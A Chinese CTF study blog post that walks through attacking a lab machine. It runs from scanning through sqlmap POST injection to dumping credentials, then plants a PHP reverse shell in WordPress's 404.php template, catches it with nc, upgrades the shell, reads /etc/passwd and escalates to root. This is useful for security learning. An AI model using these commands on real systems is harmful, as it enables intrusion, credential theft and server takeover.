我的CTF学习与教学之旅笔记6

sql注入之post:

nmap -A -T4 -v 靶场IP地址

对web'站点扫描一定要dirb、 nikto 相结合,查找信息没特别是一些登录界面如:login admin等界面

 

80端口可用的东西:

phpadmin

利用owasp-zap对漏洞进行扫描

login.php一个登陆界面(nikto搜索到的),要先尝试一下弱口令,再考虑是否有注入点(sqlmap)

 

 

8080端口可用的东西:

利用owasp-zap对漏洞进行扫描

/img目录

/wordpress

启动Burpsuite对的网站进行post扫描:

         首先在浏览器中设置代理端口;

          在burpsuite中的“proxy”标签中设置option,并观察intercept标签内容

         填写好信息,提交,并在burpsuite截断相关信息,全部截取intercept标签内容,并保存到一个request.raw文件

sqlmap -r request.raw --level=5 --risk=3 --dbs --dbms mysql --batch

sqlmap -r request.raw --level=5 --risk=3 -D 数据库 --tables --dbms mysql --batch 

sqlmap -r request.raw --level=5 --risk=3 -D 数据库 -T 数据表 --columns --dbms mysql --batch 

sqlmap -r request.raw --level=5 --risk=3 -D 数据库 -T 数据表 -C 字段列表 --dbms mysql --batch --dump

至此,可以看到数据

利用获取到的用户名和密码登录到wordpress/wp-login.php

接下来就可以利用网站漏洞,拿权限了

1.可以用msfvenom -p php/meterpreter/reverse_tcp -f raw 生成木马的PHP文件,将该文件内容利用wordpress的themes下的editor,修改404.php文件模板,这种方式要启动msfconsole,use exploit/multi/handler,并加载相关载荷。

2.也可以直接利用kali系统中的/usr/share/webshells/php/php-reverse-shell.php中的内容,改写上述的404.php文件。这种方式接下来要用nc -nlvp 4444 (端口号进行监听)

python -c "import pty;pty.spawn('/bin/bash')"

cat /etc/passwd 

su - 进行root 提权,密码可以参考用sqlmap得到的密码

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值